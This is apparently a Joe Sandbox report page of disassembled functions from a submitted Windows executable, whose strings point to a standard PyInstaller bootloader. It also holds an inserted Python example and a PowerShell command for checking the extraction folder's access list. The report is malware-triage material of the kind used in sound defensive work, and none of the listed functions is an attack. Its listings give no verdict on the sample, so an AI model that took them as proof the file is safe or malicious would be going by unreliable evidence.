Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
• Instruction ID: 83bdeffa9b284bc39f9b9522989849a960c31d204fa483dd02379651e05699df
• Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
• Instruction Fuzzy Hash: D451C362A0D64281E660BB91A450BBAA2A0FF45B94FF44131ED4D877C5FF3CED49C312

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF78DA6F11A,?,?,-00000018,00007FF78DA6ADC3,?,?,?,00007FF78DA6ACBA,?,?,?,00007FF78DA65FAE), ref: 00007FF78DA6EEFC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF78DA6F11A,?,?,-00000018,00007FF78DA6ADC3,?,?,?,00007FF78DA6ACBA,?,?,?,00007FF78DA65FAE), ref: 00007FF78DA6EF08
                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction ID: 1126761dc44b7070d7ee64aee631e087f04f19c47700a1495ac5ad41fce26ca2
• Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
• Instruction Fuzzy Hash: DB41E161B1DA02D1EE15EB56A804D75A291BF48B90FF88539DD1D87384FE3CED0DC222

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536E1
• GetLastError.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536EB
  • Part of subcall function 00007FF78DA52C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52C9E
  • Part of subcall function 00007FF78DA52C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52D63
  • Part of subcall function 00007FF78DA52C50: MessageBoxW.USER32 ref: 00007FF78DA52D99
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: 7717ac3ef6787c80bccf3a6e8d4662c83217e52139907c3021cf21ed31e9620a
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 1F216051F1C64291FA20BB60E805BBAA260BF88354FF00132E59DC65D5FF2CE90DC722

Control-flow Graph (graph image not preserved): basic blocks 7ff78da6bacc-7ff78da6bf18; API calls shown on the graph: GetConsoleMode, ReadConsoleW, ReadFile, GetLastError.
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction ID: 46536c5922b77fcf228592f417f6fff557ab2719c0fd3e374e782951251f6bed
• Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
• Instruction Fuzzy Hash: 89C1C42290C686D1E761AB95A440ABDB764FB81B80FF54131EA4E07791EF7CEC4DC722

Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
• API String ID: 995526605-0
• Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction ID: f8e6b55bf8febffb97b263d3788e4d42a3d97327b0c6da191260e4d70d237ae6
• Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
• Instruction Fuzzy Hash: B0210821A0C64241DB50ABA5F454639E7B0FF957F0FB00235E6AD836E4EF6CD849C751

APIs
  • Part of subcall function 00007FF78DA58760: GetCurrentProcess.KERNEL32 ref: 00007FF78DA58780
  • Part of subcall function 00007FF78DA58760: OpenProcessToken.ADVAPI32 ref: 00007FF78DA58793
  • Part of subcall function 00007FF78DA58760: GetTokenInformation.KERNELBASE ref: 00007FF78DA587B8
  • Part of subcall function 00007FF78DA58760: GetLastError.KERNEL32 ref: 00007FF78DA587C2
  • Part of subcall function 00007FF78DA58760: GetTokenInformation.KERNELBASE ref: 00007FF78DA58802
  • Part of subcall function 00007FF78DA58760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF78DA5881E
  • Part of subcall function 00007FF78DA58760: CloseHandle.KERNEL32 ref: 00007FF78DA58836
• LocalFree.KERNEL32(?,00007FF78DA53C55), ref: 00007FF78DA5916C
• LocalFree.KERNEL32(?,00007FF78DA53C55), ref: 00007FF78DA59175
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                        • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction ID: 38e73d5a21fb3f93e953ea29d9bf16f4ca47bb2623f3a6aed64981b9c0a68c54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75213021A0C74281E650BB50E515AEAA360FF88740FF44435EA4D977C6EF3CDD09C761
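What the function above builds, shown as an added example (Python; not code from the report and not the PyInstaller project's own code). The referenced strings D:(A;;FA;;;%s), D:(A;;FA;;;%s)(A;;FA;;;%s) and S-1-3-4, together with the GetTokenInformation / ConvertSidToStringSidW subcalls, are an SDDL DACL that grants FILE_ALL_ACCESS to the calling user's SID and optionally to the well-known OWNER RIGHTS SID S-1-3-4, and nothing to anyone else; the PYI_PATH_MAX error string places this in the PyInstaller bootloader, which uses such a descriptor to lock down its extraction directory. The helper names, the sample SID and the numeric value assumed for PYI_PATH_MAX are this example's assumptions, not values taken from the page; the parser lets a responder check the ACL actually applied to an extracted _MEI directory.

```python
"""Rebuild and parse the DACL string whose pieces appear in the function's strings.

Added example, not code from the report or from PyInstaller. The two format
strings and the S-1-3-4 SID come from the function's string references; the
PYI_PATH_MAX value, the function names and the sample SID are assumptions.
"""
import re

PYI_PATH_MAX = 4096            # assumed limit; the report only shows the macro name
OWNER_RIGHTS_SID = "S-1-3-4"   # well-known OWNER RIGHTS SID seen in the strings

# Constructed sample user SID (not from the report).
SAMPLE_USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"

# One SDDL ACE: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;sid)
_ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def build_dacl(user_sid: str, add_owner_rights: bool = True) -> str:
    """Mirror the two format strings: D:(A;;FA;;;<sid>) or the same plus an
    OWNER RIGHTS ACE. 'A' is an access-allowed ACE, 'FA' is FILE_ALL_ACCESS, and
    the empty flags field means no inheritance, so only the listed principals
    get access. The length check reproduces the PYI_PATH_MAX error path."""
    if add_owner_rights:
        sddl = "D:(A;;FA;;;%s)(A;;FA;;;%s)" % (user_sid, OWNER_RIGHTS_SID)
    else:
        sddl = "D:(A;;FA;;;%s)" % user_sid
    if len(sddl) >= PYI_PATH_MAX:
        raise ValueError("Security descriptor string length exceeds PYI_PATH_MAX!")
    return sddl


def parse_dacl(sddl: str):
    """Return a list of (ace_type, flags, rights, sid) tuples for a DACL-only
    SDDL string such as the one build_dacl() produces."""
    if not sddl.startswith("D:"):
        raise ValueError("expected a DACL-only SDDL string starting with 'D:'")
    aces = _ACE_RE.findall(sddl[2:])
    return [(t, flags, rights, sid) for t, flags, rights, _obj, _iobj, sid in aces]


def is_restricted_to(sddl: str, user_sid: str) -> bool:
    """True when every ACE is an allow ACE for user_sid or OWNER RIGHTS only,
    i.e. no other principal (Everyone, Users, ...) has any access."""
    aces = parse_dacl(sddl)
    allowed = {user_sid, OWNER_RIGHTS_SID}
    return bool(aces) and all(t == "A" and sid in allowed for t, _f, _r, sid in aces)


if __name__ == "__main__":
    dacl = build_dacl(SAMPLE_USER_SID)
    print(dacl)
    for ace in parse_dacl(dacl):
        print("  ", ace)
    print("restricted to sample user:", is_restricted_to(dacl, SAMPLE_USER_SID))
```

On a live host the string to feed into parse_dacl() is what `Get-Acl -Path $env:TEMP\_MEI* | Select-Object -ExpandProperty Sddl` returns for the extraction directory; a descriptor that grants anything beyond the user's SID and S-1-3-4 means the bootloader's lock-down did not take effect.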

Control-flow Graph

• Executed
• Not Executed
• Graph for the function at 7ff78da6cfd0 (entry block 7ff78da6cfd0-7ff78da6cff5, exit block 7ff78da6d2c5-7ff78da6d2d5), 70 basic blocks. Windows API calls on the graph: GetConsoleMode (7ff78da6d0df-7ff78da6d0f4), GetLastError (7ff78da6d177-7ff78da6d17d), WriteFile (7ff78da6d210-7ff78da6d235), GetLastError (7ff78da6d237-7ff78da6d23d). Internal calls: 7ff78da6a884, 7ff78da6c390, 7ff78da7398c, 7ff78da64830, 7ff78da6ca88, 7ff78da6cca8, 7ff78da6cb8c, 7ff78da6c610, 7ff78da73a58 (called from two blocks), 7ff78da64f34.
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78DA6CFBB), ref: 00007FF78DA6D0EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78DA6CFBB), ref: 00007FF78DA6D177
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction ID: efd69b98e21019b401265085879c1c833b68bf936a8468d575a5dc7f2dee6407
• Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction Fuzzy Hash: 2F910972F0C651D5FB50AFA5A440A7DABA0BB44BC8FB44135DE0E17684EE38DC4AC722
APIs
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: 38bb47b91681e90e3759e5caa50946c98ba77ec29ab84b318196f2ebe460bc12
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: 6D41A362D1C781C3E314ABA1A514779A260FF94754F709334EA9C03AD1EF6DE8E8C721
APIs
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: 8b5a625c377fdb515b2202e9c594f6b6adbb8d029a8a1063439ad87e4e09b1ce
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: 3C313812E0D24291EA54BBA5A451BB9A7A1BF41784FF40434D94ED72DBFE2CAC4CC223
APIs
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction ID: f50a2b0ba1f7e0d10460c0c42d4e45bf090ac420850252fcc64b8b90719086e3
• Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction Fuzzy Hash: 14D06750B0C64682EA547FB1689987892917F58B51BB41838D84B16393FD2CEC4EC322
APIs
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction ID: 89a0d66e74d23778988640b6be1af4073295565d8ca227545b3d57bf77b45270
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA51F721A0D641C6E734AEB5A440E7AA291BF44FA4FB44630DE6D037C5EF3CDC89C626
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                        • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction ID: 49b95c72ff14f870fe2760da0d9a5e477aba02d8da39df5412afdba00879666b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611E26170CA4181DA10BB65B804569A761BB45BF0FB40331EE7D4B7D8EF3CD809C702
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                        • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction ID: cb992dc3656c9c44324079b869f89d8e090d5bf0edf12629a087b7d1aa4258d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FE0BF51E0D60292FF157BF2785597991517F94B40FB54035D91D462A1FE2CEC8DC222
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC36
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC40
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction ID: 11b825b06d2f4df90cfa4fabadceda2815e9f63f254cf8df35364a9b72fbfa8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2521A711B1C64281EB9477E2B450A7E9292BF847A0FB84235D92E477C1FE6CEC4DC312
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction ID: c1059818f53ec85c8e6a1c0b8f46978a3c279a8cf73f3f8bc585a32c2e71f0f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5241B63290D201C7EA34BBA5B540679B7A4FB55B44FB04131D68D476D1EF2DE806CB62
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                        • Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                                        • Instruction ID: 446cc64a2cccb539d2c3f9e237bed5d4a80ee52572a11b335388ea34dc261adc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE210421B0C65185FA50BAA26400BBAD660BF45BD4FFC0030EE1C47B86EE3CE849C622
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
